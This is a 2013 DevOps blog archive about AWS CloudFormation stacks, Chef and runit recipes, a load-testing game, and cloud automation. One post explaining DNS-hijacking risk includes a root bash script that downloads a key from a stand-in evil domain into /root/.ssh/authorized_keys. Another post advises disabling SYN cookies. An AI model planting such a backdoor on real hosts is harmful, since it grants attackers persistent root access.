Wednesday, November 20, 2013

Gut check

Let's do a quick gut check on where we are in the evolution of our information technology.

First we start with this math problem:
http://en.wikipedia.org/wiki/Wheat_and_chessboard_problem

Now we look at Moore's law:
http://en.wikipedia.org/wiki/Moore's_law

In the abstract, Moore's law says that the capacity of our compute resources doubles roughly every 18 months; let's extend that to say that the pace of technology adoption, and our overall use of technology, doubles in that same period.

If we start at the epoch of Jan 1, 1970 and count the number of 18-month periods since then, we get roughly 29.3 periods as of this writing, so let's call it 29.

This puts us here:
1,073,741,823
http://www.wolframalpha.com/input/?i=%5Csum_%7Bi%3D0%7D%5E%7B29%7D+2%5Ei.%5C%2C+
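
The WolframAlpha link is just evaluating a geometric series, which has a tidy closed form that confirms the numbers below:

    \sum_{i=0}^{n} 2^i = 2^{n+1} - 1, \qquad \sum_{i=0}^{29} 2^i = 2^{30} - 1 = 1{,}073{,}741{,}823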

Let's put this number in context. The previous iteration, 28, gives this number ( just about half, of course ):
536,870,911

The next iteration will give ( almost exactly double, of course ):
2,147,483,647

These are some pretty huge numbers, and in this model we can put numbers behind how fast things are about to start moving.  Look around you and watch how toddlers are running iPads and adapting to technology that the older generation is simply unequipped to deal with.

If this model is accurate, then the pace of technology will accelerate to a point where each successive cycle doubles the velocity of the one before it, which accelerates everything even more.

This is a very exciting time to be alive!

Embedded stacks

The theater:
https://github.com/krogebry/pentecost/blob/master/templates/theater.json

This is what I refer to as the "root" template, where we set up all of our core params and start building sub-stacks.

The first subnet, known as the Ops or OpsAuto subnet is created with this chunk:

"OpsAutoSubnet": {      "Type": "AWS::CloudFormation::Stack",      "Properties": {        "TemplateURL": "https://s3-us-west-2.amazonaws.com/cloudrim/core/subnet-opsauto.json",        "Parameters": {          "VPCId": { "Ref": "VPC" },          "CidrBlock": { "Fn::FindInMap": [ "SubnetConfig", "OpsAuto", "CIDR" ]},          "AvailabilityZone": "us-east-1b",          "InternetGatewayId": { "Ref": "InternetGateway" }        }      }    } 
The source for this can be found here:
https://github.com/krogebry/pentecost/blob/master/templates/core/subnet-opsauto.json
As you can see, the subnet-opsauto.json stack template creates a subnet within the main VPC, then attaches ACL entries and a security group.
This is very handy for encapsulating all of the security rules for a given software package in one place.
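A rough sketch of the shape of such a sub-stack template ( the resource names and the SSH rule here are illustrative, not copied from the repo ):

    {
      "Parameters": {
        "VPCId": { "Type": "String" },
        "CidrBlock": { "Type": "String" },
        "AvailabilityZone": { "Type": "String" }
      },
      "Resources": {
        "Subnet": {
          "Type": "AWS::EC2::Subnet",
          "Properties": {
            "VpcId": { "Ref": "VPCId" },
            "CidrBlock": { "Ref": "CidrBlock" },
            "AvailabilityZone": { "Ref": "AvailabilityZone" }
          }
        },
        "OpsSecurityGroup": {
          "Type": "AWS::EC2::SecurityGroup",
          "Properties": {
            "VpcId": { "Ref": "VPCId" },
            "GroupDescription": "Security rules for the OpsAuto subnet",
            "SecurityGroupIngress": [
              { "IpProtocol": "tcp", "FromPort": "22", "ToPort": "22", "CidrIp": "10.0.0.0/16" }
            ]
          }
        }
      },
      "Outputs": {
        "SubnetId": { "Value": { "Ref": "Subnet" } },
        "SecurityGroupId": { "Value": { "Ref": "OpsSecurityGroup" } }
      }
    }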
Now let's take a look at a generic subnet:
https://github.com/krogebry/pentecost/blob/master/templates/core/subnet-primary.json
I'll eventually get around to cleaning things up so it's more abstract and versatile.  The idea here is to create a generic pattern for how we expect all of our applications to function.  At the moment I haven't defined any specific ACLs or security groups, so traffic will not be able to flow from one network to the next.
There are two ways of approaching this:
  1. Create a custom subnet definition for each application stack which defines the ACLs and security groups.
  2. Define the same groups in the root template by using Fn::GetAtt to reach into the stack and pull out the Output variables ( see the snippet below ).
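For the second approach, the root template can reach into a sub-stack's Outputs like this ( SecurityGroupId here is a hypothetical Output name, not one taken from the repo ):

    { "Fn::GetAtt": [ "OpsAutoSubnet", "Outputs.SecurityGroupId" ] }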
Either approach is fine; it's up to you to decide which method will be better for the long-term health of your organization.
In either case, CI/CD is still a valid possibility.
One final thought on this subject: Huge thanks to the CloudFormation team for being totally awesome!

Embedded CloudFormation: using stacks in a non-compiled context

First off, I want to define the two ways in which I've learned to create CloudFormation templates:

  1. Compiled: this method uses a client/server model that looks very much like the chef-client/chef-server model.  Small chunks of JSON are used to kick off a template build, which assembles a large template file from many component parts.
  2. Embedded: this process uses no pre-compile magic, but instead uses a "root" template to kick off n-number of sub-stacks using the AWS::CloudFormation::Stack resource.
Now let's define a use case that can help illuminate the situation.  I'm going to use my favorite project of all time for this: CloudRim!

CloudRim has a fairly standard layout:
  1. Contained in a VPC with 3 subnets:
    1. Ops ( 10.0.0.0/24 - us-east-1b ): This is where the chef server, proxy, and jenkins slaves live; this is also the "jump box," also known as the "threshold box."
    2. Primary ( 10.0.1.0/24 - us-east-1b ): This is where the primary, production application runs.
    3. Secondary ( 10.0.2.0/24 - us-east-1e ): This is where we put our HA backup for this region.
  2. The application itself is a node.js application that runs multiple instances, each instance on its own port, with all ports tied together by ASGs, ELBs, and finally Route53.
  3. The data storage layer is a sharded MongoDB database, with the mongos bits running on the application servers.
  4. Everything is configured with chef.
When we use the compiled version we'll end up with a group of stacks that looks like this:
  1. VPC
  2. OpsAuto
  3. Application-A
  4. Application-B
  5. MongoDB-A
  6. MongoDB-B ( repl set )
When using the embedded approach we get a slightly different layout:
  1. Root
    1. VPC Subnet Ops
    2. VPC Subnet Primary
    3. VPC Subnet Secondary
    4. Application-A
    5. Application-B
    6. MongoDB-A
    7. MongoDB-B ( repl set )
They look basically the same; however, one of the advantages of the embedded approach is that everything can be removed by deleting the Root stack.  Obviously that could be a bad thing as well, depending on the use case.

Some people might be tempted to state that the repl set should be handled in a different stack, and I'm inclined to agree with that statement.  However, for the purpose of this document we'll stick with this layout so we can keep everything together in one logical construct.

The embedded approach is very compelling, however, there is one aspect of this that happens to be a significant drawback: troubleshooting.

The embedded approach is what's known as a "derived" approach, which is to say that you have to think of every single element as an abstract idea.  This is very difficult for those just starting out with the technology, because it forces you to visualize how things are going to play out without ever seeing the final, compiled version of the template.  Troubleshooting in this environment is very difficult, even for a seasoned veteran like myself.

In contrast, the compiled approach specifically targets this problem.  It is much easier to debug and maintain, and it supports a much faster iteration cycle.  Templates are used to make things faster and more agile; the drawback to this speed is that it requires a compile layer ( client/server ) in order to actually work.

Either solution can be integrated into a CI/CD system, and both systems have an equal pro/con list.  Choosing which method you go with really comes down to how much work you're willing to do in the long run.

The embedded version requires a deep knowledge of AWS and specifically how CloudFormation works.  However, the compiled version requires running a client/server service that looks and acts much like chef.

If your team(s) are familiar with AWS and have a basic understanding of CF, then the embedded approach does make more sense.  However, for larger, more complex scenarios where many business groups are going to be using this system, a more modular approach with the compiled method could save time and headache in the long run.

Ping me for code snippets.

Saturday, November 9, 2013

More CF Automation Awesomeness

Everything just got condensed to this:

    "DragonGroup": {
      "Name": "HTC::OpsAuto::Plugin::ELBServiceGroup",
      "Type": "HTC::Plugin",
      "Properties": {
        "PortStart": 9000,
        "NumberOfPorts": 3,
        "DNSName": "cloudrim",
        "Weights": [ "40","30","30" ],
        "SecurityGroupName": "LoadBalancerSecurityGroup"
      }
    },

and this:

    "NumServicePorts": {
      "Type": "String",
      "Description": "Number of service instance ports"
    }


and this:

    "ConfigASG": {
      "Type": "AWS::AutoScaling::AutoScalingGroup",
      "Properties": {
        "Tags": [{ "Key": "DeploymentName", "Value": { "Ref": "DeploymentName" }, "PropagateAtLaunch": "true" }],
        "MinSize": { "Ref": "Min" },
        "MaxSize": { "Ref": "Max" },
        "DesiredCapacity": { "Ref": "DesiredCapacity" },
        "AvailabilityZones": [{ "Ref": "AvailabilityZone" }],
        "VPCZoneIdentifier": [{ "Ref": "PrivateSubnetId" }],
        "LoadBalancerNames": { "HTC::GetVar": "elb_names" },
        "LaunchConfigurationName": { "Ref": "ServiceLaunchConfig" }
      }
    }
I wrote the "HTC::GetVar" chunk so I can create variable data in plugins and pass it back to the stack.  The best part is that the variables persist on the object!  Thanks Mongo!
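
This is custom tooling, not a native CloudFormation feature.  A minimal sketch of how such a resolver might work, assuming the compile step walks the parsed template and substitutes values that plugins stored earlier in the run ( every name here is hypothetical ):

# Hypothetical resolver for the custom "HTC::GetVar" chunk.
# Walks a parsed template and replaces { "HTC::GetVar" => "name" }
# nodes with values that plugins stored earlier in the compile run.
def resolve_get_vars(node, vars)
  case node
  when Hash
    if node.keys == ["HTC::GetVar"]
      vars.fetch(node["HTC::GetVar"])  # e.g. "elb_names" => ["ELB0", "ELB1"]
    else
      node.each_with_object({}) { |(k, v), out| out[k] = resolve_get_vars(v, vars) }
    end
  when Array
    node.map { |child| resolve_get_vars(child, vars) }
  else
    node
  end
end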

Running single-threaded applications like a boss using CloudFormation and Chef.

NodeJS + CF + Chef = Unicorn Awesomeness!!

The problem statement is this: how do I make use of a single-threaded application in the cloud?  This is great practice for technologies like redis, where there is a specific focus on accomplishing a very direct, targeted objective in a "weird" kind of way.  Redis is also single-threaded, but its focus is on really, really fast indexing of structured data.  In the case of Node it makes sense to run many instances of the runtime on a single compute resource, thus using more of the system's resources to get more work done.

I'm using a formula of n+1, where n is the number of ECPUs; an m1.large instance in AWS has 2 ECPUs, so it gets three node processes.  The goal here is to find an automated path to running the cloudrim-api on many ports of a single compute instance, then load balancing the incoming requests across an array of ELBs, each ELB attached to a separate port but the same group of nodes, while maintaining that all traffic coming into any given ELB group is always on port 9000.

High-level summary

This is creating several AWS objects:

  • A security group for the load balancer which says "only allow traffic in on port 9000."
  • 2 Elastic Load Balancer objects, both of which listen on port 9000 but direct traffic to either 9000 or 9001 on the target.
  • Each ELB has its own DNS Alias record.
  • A regional DNS entry is created in a way that Route53 will create a weighted set for each entry in the resource collection.
The magic is in the last step: what we end up with is an endpoint, cloudrim.us-east-1.opsautohtc.net, which points at a weighted set of ELBs.  Each ELB points to a specific port on a collection of nodes; the collection of nodes is the same for each ELB, but the ports differ.

This allows us to run many instances of a software package in a dynamic way ( more ECPUs will grow most of the system automatically ).  I'm combining this with runit for extra durability: runit ensures that the process is always running, so if the service crashes, runit automatically spawns a new instance almost immediately.


CloudFormation bits:

    "LoadBalancerSecurityGroup": {
      "Type": "AWS::EC2::SecurityGroup",
      "Properties": {
        "VpcId": { "Ref": "VpcId" },
        "GroupDescription": "Enable HTTP access on port 9080",
        "SecurityGroupIngress": [
          { "IpProtocol": "tcp", "FromPort": "9000", "ToPort": "9000", "CidrIp": "0.0.0.0/0" }
        ],
        "SecurityGroupEgress": [ ]
      }
    },
    "ElasticLoadBalancer0": {
      "Type": "AWS::ElasticLoadBalancing::LoadBalancer",
      "Properties": {
        "Subnets": [{ "Ref": "PrivateSubnetId" }],
        "Scheme": "internal",
        "Listeners": [{ "LoadBalancerPort": "9000", "InstancePort": "9000", "Protocol": "TCP" }],
        "HealthCheck": {
          "Target": "TCP:9000",
          "Timeout": "2",
          "Interval": "20",
          "HealthyThreshold": "3",
          "UnhealthyThreshold": "5"
        },
        "SecurityGroups": [{ "Ref": "LoadBalancerSecurityGroup" }]
      }
    },
    "ElasticLoadBalancer1": {
      "Type": "AWS::ElasticLoadBalancing::LoadBalancer",
      "Properties": {
        "Subnets": [{ "Ref": "PrivateSubnetId" }],
        "Scheme": "internal",
        "Listeners": [{ "LoadBalancerPort": "9000", "InstancePort": "9001", "Protocol": "TCP" }],
        "HealthCheck": {
          "Target": "TCP:9001",
          "Timeout": "2",
          "Interval": "20",
          "HealthyThreshold": "3",
          "UnhealthyThreshold": "5"
        },
        "SecurityGroups": [{ "Ref": "LoadBalancerSecurityGroup" }]
      }
    },
    "DNSEntry0": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim0.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "A",
          "AliasTarget": {
            "DNSName": { "Fn::GetAtt": [ "ElasticLoadBalancer0", "DNSName" ] },
            "HostedZoneId": { "Fn::GetAtt": [ "ElasticLoadBalancer0", "CanonicalHostedZoneNameID" ] }
          }
        }]
      }
    },
    "DNSEntry1": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim1.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "A",
          "AliasTarget": {
            "DNSName": { "Fn::GetAtt": [ "ElasticLoadBalancer1", "DNSName" ] },
            "HostedZoneId": { "Fn::GetAtt": [ "ElasticLoadBalancer1", "CanonicalHostedZoneNameID" ] }
          }
        }]
      }
    },
    "RegionDNSEntry": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array0",
          "Weight": "30",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim0.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        },{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array1",
          "Weight": "40",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim1.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        },{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array2",
          "Weight": "30",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim2.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        }]
      }
    },
    "ConfigASG": {
      "Type": "AWS::AutoScaling::AutoScalingGroup",
      "Properties": {
        "Tags": [{ "Key": "DeploymentName", "Value": { "Ref": "DeploymentName" }, "PropagateAtLaunch": "true" }],
        "MinSize": { "Ref": "Min" },
        "MaxSize": { "Ref": "Max" },
        "DesiredCapacity": { "Ref": "DesiredCapacity" },
        "AvailabilityZones": [{ "Ref": "AvailabilityZone" }],
        "VPCZoneIdentifier": [{ "Ref": "PrivateSubnetId" }],
        "LoadBalancerNames": [
          { "Ref": "ElasticLoadBalancer0" },
          { "Ref": "ElasticLoadBalancer1" },
          { "Ref": "ElasticLoadBalancer2" }
        ],
        "LaunchConfigurationName": { "Ref": "ServiceLaunchConfig" }
      }
    }

And now the chef bits:

# Which services should run on this node ( driven by node attributes ).
services = node["htc"]["services"] || [ "api" ]
Chef::Log.info( "SERVICES: %s" % services.inspect )
# The n+1 formula: one service instance per processor, plus one.
num_procs = `cat /proc/cpuinfo |grep processor|wc -l`.to_i + 1
Chef::Log.info( "NumProcs: %i" % num_procs )
num_procs.times do |i|
  # Each instance gets its own runit service and its own port, starting at 9000.
  Chef::Log.info( "Port: %i" % (9000+i) )
  runit_service "cloudrim-api%i" % i do
    action [ :enable, :start ]
    options({ :port => (9000+i) })
    template_name "cloudrim-api"
    log_template_name "cloudrim-api"
  end
end

Template:

cat templates/default/sv-cloudrim-api-run.erb
#!/bin/sh
exec 2>&1
PORT=<%= @options[:port] %> exec chpst -uec2-user node /home/ec2-user/cloudrim/node.js
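
The log side isn't shown here; a typical runit log run script ( an assumption on my part, just the standard svlogd idiom ) would look like:

#!/bin/sh
# Collect and rotate timestamped logs for this service instance.
exec svlogd -tt ./main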

Monday, November 4, 2013

Chef and Jenkins

I create chef bits that create jenkins build jobs.  This way I can "create the thing that creates the things."  I can reset the state of things by running rm -rf *-config.xml jobs/* on the jenkins server, restarting jenkins, then running chef-client, and everything gets put back together automatically.  This also allows me to change the running jobs in real time, then reset everything when I'm done.
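
Spelled out, the reset cycle looks something like this ( paths assume the jenkins-data directory used in the recipe below ):

# Wipe the generated job configs and job workspaces, then rebuild.
cd /var/lib/jenkins/jenkins-data
rm -rf *-config.xml jobs/*
sudo service jenkins restart
sudo chef-client  # recreates every job from the chef templates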

recipes/jenkins-builder.rb

pipelines = []
dashboards = []

region_name = "us-east-1"
domain_name = "opsautohtc.net"
deployment_name = "Ogashi"
pipelines.push({
  :name => "Launch %s" % deployment_name,
  :num_builds => 3,
  :description => "

Prism

  • Cloud: AWS
  • Region: us-east-1
  • Account: HTC CS DEV
  • Owner: Bryan Kroger ( bryan_kroger@htc.com )
",
  :refresh_freq => 3,
  :first_job_name => "CloudFormation.%s.%s.%s" % [deployment_name, region_name, domain_name],
  :build_view_title => "Launch %s" % deployment_name
})
cloudrim_battle_theater deployment_name do
  action :jenkins_cloud_formation
  az_name "us-east-1b"
  git_url "git@gitlab.dev.sea1.csh.tc:operations/deployments.git"
  region_name region_name
  domain_name domain_name
end
cloudrim_battle_theater deployment_name do
  action :jenkins_exec_helpers
  az_name "us-east-1b"
  git_url "git@gitlab.dev.sea1.csh.tc:operations/deployments.git"
  region_name region_name
  domain_name domain_name
end
dashboards.push({ :name => deployment_name, :region_name => "us-east-1" })

template "/var/lib/jenkins/jenkins-data/config.xml" do
  owner "jenkins"
  group "jenkins"
  source "jenkins/config.xml.erb"
  #notifies :reload, "service[jenkins]"
  variables({ :pipelines => pipelines, :dashboards => dashboards })
end



cloudrim/providers/battle_theater.rb:

def action_jenkins_exec_helpers()
  region_name = new_resource.region_name
  domain_name = new_resource.domain_name
  deployment_name = new_resource.name

  proxy_url = "http://ops.prism.%s.int.%s:3128" % [region_name, domain_name]

  proxy = "HTTP_PROXY='%s' http_proxy='%s' HTTPS_PROXY='%s' https_proxy='%s'" % [proxy_url, proxy_url, proxy_url, proxy_url]

  job_name = "ExecHelper.chef-client.%s.%s.%s" % [deployment_name, region_name, domain_name]
  job_config = ::File.join(node[:jenkins][:server][:data_dir], "#{job_name}-config.xml")
  jenkins_job job_name do
    action :nothing
    config job_config
  end
  template job_config do
    owner "jenkins"
    group "jenkins"
    source "jenkins/htc_pssh_cmd.xml.erb"
    cookbook "opsauto"
    variables({
      #:cmd => "%s sudo chef-client -j /etc/chef/dna.json" % proxy, 
      :cmd => "%s sudo chef-client" % proxy,
      :hostname => "ops.prism",
      :domain_name => domain_name,
      :region_name => region_name,
      :deployment_name => deployment_name
    })
    notifies :update, resources(:jenkins_job => job_name), :immediately
  end

 [...]

end


Sunday, November 3, 2013

Great run...

We had a great first run of the BattleTheater today.  Release 0.0.9 fixes a ton of bugs relating to the engines.

I have found an absolutely brilliant way of running the nodejs services.  I have this in my services.rb recipe:

runit_service "cloudrim-kaiju" do
  log false
  if(services.include?( "kaiju" ))
    action [ :enable, :start ]
  else
    action [ :disable, :down, :stop ]
  end
end

I can run a variable number of nodejs services based on the contents of the node["htc"]["services"] array.
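
For example, the attribute driving this might look like ( a hypothetical chunk of node JSON, not taken from the repo ):

{
  "htc": {
    "services": [ "api", "kaiju" ]
  }
}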

These runit services are templated, but basically I can run a service that does this:

node /home/ec2-user/cloudrim/engines/kaiju.js

And run the Kaiju Engine as its own process.  Runit takes care of making sure the service is always running, and I don't have to mess with init scripts!!

Thank you #opscode !

How do I CloudRim?

Do something like this:

curl -XPOST -H "Content-Type: application/ajax" -d '{"email":"your.email@blah.com"}' http://Tanaki-cl-ElasticL-10851AT1WINID-1417527178.us-east-1.elb.amazonaws.com:9000/hq/battle

You'll get this back:

{"kaiju":{"hp":90.71948742261156,"xp":0,"str":7,"name":"Knifehead92","level":14,"armor":7,"speed":7,"bonuses":{"ice":0,"fire":0,"earth":0,"water":6},"category":3,"actor_type":"kaiju","_id":"5276b4d902b6008c0e00007d"},"jaeger":{"level":33,"_id":"5276b4d94a2ad64d0e00007a","hp":100,"name":"","weapons":{"left":{"ice":0,"fire":1,"earth":9,"water":0},"right":{"ice":5,"fire":9,"earth":1,"water":0}}}}


Friday, November 1, 2013

CloudRim

GitRepo

CloudRim is a little game I came up with to help people understand high-volume load and scaling techniques in AWS.

The idea here is that I launch a "Battle Theater" into an AWS region, let's say us-east-1 for example.  The BT is basically a MongoDB rig with automatic sharding in place.  When the battle begins I will announce "The Kaiju have landed in USEast!!" and the battle will begin.

Most games are centered around the idea of keeping people off the server and doing as much local caching as possible.  This is not that, by a good long shot.  The idea of this game is to pound the absolute shit out of the server as hard and as fast as you can.  In fact, simply using ab or a script with some threading junk won't be enough.  Even running jmeter on a single box won't be enough.

The goal of this game is to destroy all Kaiju in existence, but the Rift keeps spawning new Kaiju at a fairly high rate.  The Jaegers are also spawned at a similar rate.

There are two winning scenarios in the game: either the Kaiju win and you suck, or the Apocalypse is canceled and the heroes win.

Every time you do battle with the server you are awarded a random number of XP between 1 and 10, so in order to be at the top of the charts you have to do as many battles as possible.

Now here's the catch: this entire game is built around the idea that great automation can do amazing things.  To prove this, the BT is only deployed for an hour.  This means you have less than an hour to spin up your nodes and attack the server as hard and as fast as you possibly can.  Obviously this is going to require coordination on your part.

At the end of the game the scores are tallied up and the person at the top of the score chart is given the medal of honor or something.

The idea here is to give people a fun, engaging way of learning how automation works and why it's important.  It's also a great way to prove just how unbelievably awesome AWS really is.

Monday, October 7, 2013

DNS hacking paranoia

Every time I see a story like this, I freak out a little:

http://thehackernews.com/2013/10/worlds-largest-web-hosting-company_5.html

Long story short: DNS hijacking.

When we look at the cloud offering landscape we see cloud providers like Amazon, RackSpace, and Google, but there are also cloud management companies like RightScale and Scalr.  These cloud management companies will sometimes lay in their own custom software bits that help aid in the configuration and management of a given compute resource.

In most cases ( and we can even include things like chef servers here as well ) the compute resource that is being managed will make a call out to the "control server" for instructions.  But how does it know which server to contact?  That's where DNS comes in, for example:

configuration.us-east-1.mycompany.com

Would be a DNS entry that actually points to:

cf-chef-01.stackName0.deploymentName0.regionName.domainName.TLD

The DNS eventually points to an IP, and the client makes the call.

If an attacker is able to hijack mycompany.com, they could point configuration.us-east-1 at their own IP address.  Most of these configuration management applications use some kind of authentication or validation to prove they are who they say they are.  In the case of chef, API calls are signed with the client's private key and verified against the key registered on the server side, which makes "man in the middle" attacks much more difficult.

In some cases the configuration management software simply makes a call to a worker queue which uses a basic username/password system.  In this case one could wrap any type of generic worker queue with an "always pass authentication" switch that lets any client successfully authenticate.  This would allow you to control the client by simply injecting worker elements into the queue.

For example, we could create a worker element that runs the following script as root:

#!/bin/bash
# Fetch the attacker's public key and append it to root's authorized_keys,
# granting persistent SSH access as root.
curl -o /tmp/tmp.cache.r1234 http://my.evil.domain.com/public_key
cat /tmp/tmp.cache.r1234 >> /root/.ssh/authorized_keys

This would work great for any node that isn't in a VPC and is attached to a public IP.  Other trickery could be used to extend the evilness of this hack, but the point is that if someone can execute something on the remote box as root, you're pretty well fucked.

This is why DNS hijacking stories scare me a little.

Friday, October 4, 2013

tcp syn flooding ... why does this keep happening?

Linux itself is just a kernel; all of the crap around the kernel, from bash to KDE, is considered part of the distro.  Linux distros come in many flavors, shapes, and sizes.  This is beneficial to everyone, as it allows for a few generic "types" of distros that can then specialize with further customizations.  For example, Ubuntu is derived from the Debian base type.  Similarly, CentOS is derived from Red Hat Enterprise Linux.

The differences between CentOS and RHEL are mostly related to licensing and support.  Red Hat the company publishes, maintains, and supports the Red Hat Enterprise Linux ( RHEL ) distribution.  Their product isn't Linux; it's actually the support and maintenance of the distribution around Linux.  CentOS is not a product; it's maintained by the community according to their perfectly adequate community standards.

Amazon also makes its own AMI.  Their AMI is specifically designed to work in their EC2 environment.  The expectation is that this AMI will be used in a high-traffic environment.

When having a discussion about which distribution to go with, it's important to pay attention to the expectations of use.  These expectations aren't always as obvious as the expectations around the Amazon AMI.  Amazon makes its expectations very clear:

"the instance that you use with this AMI will take significant amounts of traffic from one or may sources"

This expectation is set by engineers who were paid large sums of money to ensure that it is reflected in every decision made by the maintainers of the Amazon AMI.  Amazon pinned their reputation on this AMI and they use it in their own production environments; that tells me quite a bit about what went into making this distro happen.  They also support it as part of an enterprise support contract.  All of these facts make the Amazon AMI a very solid choice for cloud operations.

Other distros, like CentOS, are far less clear about their expectations.  For instance, CentOS seems to live in many worlds with no clear, specific role or specialization.  However, certain choices made by the maintainers can give us a general idea of what the intent might be.

For example, if a distro made a choice to protect the system, by default, from a type of attack known as a "SYN flood," you would see the following:

cat /proc/sys/net/ipv4/tcp_syncookies
1

This means that tcp_syncookies is enabled.  When the SYN backlog fills up, as it does under a flood ( or under very heavy legitimate traffic ), the kernel stops allocating state for new connection attempts and answers with a cryptographic cookie instead.

This is great for desktops, but it's directly in contrast to how servers are supposed to work, and exactly the opposite of what you want in a high-volume environment.

It's a very easy fix; in our case, all I had to do was add a single line to the startup script for the service nodes.

          "echo 0 > /proc/sys/net/ipv4/tcp_syncookies\n",

Easy peasy.
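
That echo only lasts until the next reboot; to make the setting persistent ( assuming a sysctl.conf-style distro ), the equivalent is:

# /etc/sysctl.conf -- disable SYN cookies on high-volume service nodes
net.ipv4.tcp_syncookies = 0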

Here's what you would see in EC2 if you were using an ELB:

  1. Instances are fine, everything is in the "In Service" state.
  2. You run ab -n 10000 -c 500 http://your_host/hb
  3. About halfway through the test the ELB goes nuts, and all of the instances are in the "Out of Service" state.
  4. The application is fine, but from the load balancer's perspective the operating system seems to be completely offline, even though you can ssh into the instance and telnet works fine.
What's happening is that the box is basically being DDoS'd by the haproxies that run as the ELB.  This type of mitigation is only useful on desktops, because in the cloud, or any kind of professionally built data center environment, it is usually handled upstream.

I remember writing about this many years ago while working at Deep Rock Drive; I'm just astonished that we still see this today in professional environments.



Sunday, September 29, 2013

Chef snippet: Creating a self-signed cert


Use this snippet to create a self-signed certificate in a few lines of chef:
server_ssl_req = "/C=US/ST=Several/L=Locality/O=Example/OU=Operations/CN=#{node[:fqdn]}/emailAddress=root@#{node[:fqdn]}"
execute "Create SSL Certs" do
  command "openssl req -subj \"#{server_ssl_req}\" -new -nodes -x509 -out /etc/nginx/cert.pem -keyout /etc/nginx/key.pem"
  # Guard block: only generate the cert if it doesn't already exist.
  not_if { ::File.exists?( "/etc/nginx/cert.pem" ) }
end

Saturday, September 28, 2013

Automation in the cloud


Far too often I've worked for companies that are using the cloud incorrectly.  It wasn't until recently that a colleague put it perfectly when he said "we use the cloud like it's just another data center."  I couldn't have put it better myself.

When we talk about this "cloud" stuff we're talking about a fundamental shift in thinking and expectations.  I see this shift in much the same way as the change in expectations between the first time I went to ESPN and going to ESPN now.  About 10 years ago sites were flat, things were relatively easy, and sites were not all that complicated.  Take a look at any property out there now: what you get isn't a web page, it's an immersive experience tailored to your advertising profile.

We typically refer to this shift in expectations as "Web 2.0."  Many years from now someone will make a documentary of sorts that tells the tale of the cloud story.  In that story the word DevOps will be used to define the change in expectations that we're going through now.  At the beginning of the story we have the traditional Linux/Unix engineers, or as I like to call them "bare metal folks."  At the end of the story we have the DevOps engineers, or "cloud people" like me.

In my travels I have found that the traditional folks are generally more conservative, and thus an incredible value to me as a balance to my inventor energy.  In most cases, though, these minds forget that when moving into the cloud, the change in expectations is absolutely vital to success.

If you really do want to make this work there are a few basic ideas that you have to come to grips with.

Nodes are replaceable 

The idea of web000.blah.us-west-1.aws.mydomain.tld is bad.  What you're used to is an environment where a wiki page ( or similar documentation ) details each node, its role, its static IP assignment, and other bits of information.  In the cloud world this doesn't exist.

This is one of the reasons why people like me are constantly banging the automation drum.  If a node has an issue in production, you simply trash it.  There is the rare edge case where you might have to take a box out of rotation for investigation, RCA, whatever, but that node should never have a path back into production.  Once it's out, it will never take production traffic again.

This is a significant hurdle for most people to get over, because it means that you have to trust the state of your environment to something like chef, puppet, ansibleworks.com or salt.  In any case trusting that something else is going to be able to do this work is difficult.

Cloud people don't struggle with this as much since we start with a configuration management tool and work from there.  If we know our automation works, then we know we can solve problems by simply trashing anything that appears broken.

Automate as much as you can

My mantra is "If it can't be automated, it shouldn't exist."  That's a pretty lofty goal for sure, but we use this as a target, and it's okay if we don't hit the target every time.  We allow for exceptions and focus our documentation efforts on those exceptions.  Everything else we try to automate as much as we can.

+Brian Aker said recently in his keynote at LinuxCon/CloudOpen North America that they removed SSH from production.

Think about how this would work as a design philosophy.  You start with the idea that you will have absolutely no access to a production resource, and no way to enable SSH at any point after it's deployed.

This would require that you have everything correct before production; in other words, your testing, automation, and automated testing are so locked down that you are absolutely confident everything will work in production.

This is the fundamental lesson to be learned from cloud computing.  It's not just a bunch of virtualization and "wasted cycles"; it's an enforcement engine for proper design.  If you can honestly say that you can safely remove SSH from all of your production bare metal resources and be perfectly fine with doing that, then you win.  However, I know for a fact that the vast majority of data center operations would not work without SSH.

Good automation makes the cloud work.  Remember, every time you solve a problem with a bash script, a unicorn dies.  Do your part to stop unicorn genocide and ban bash from your configuration management solution.

Virtualization doesn't suck

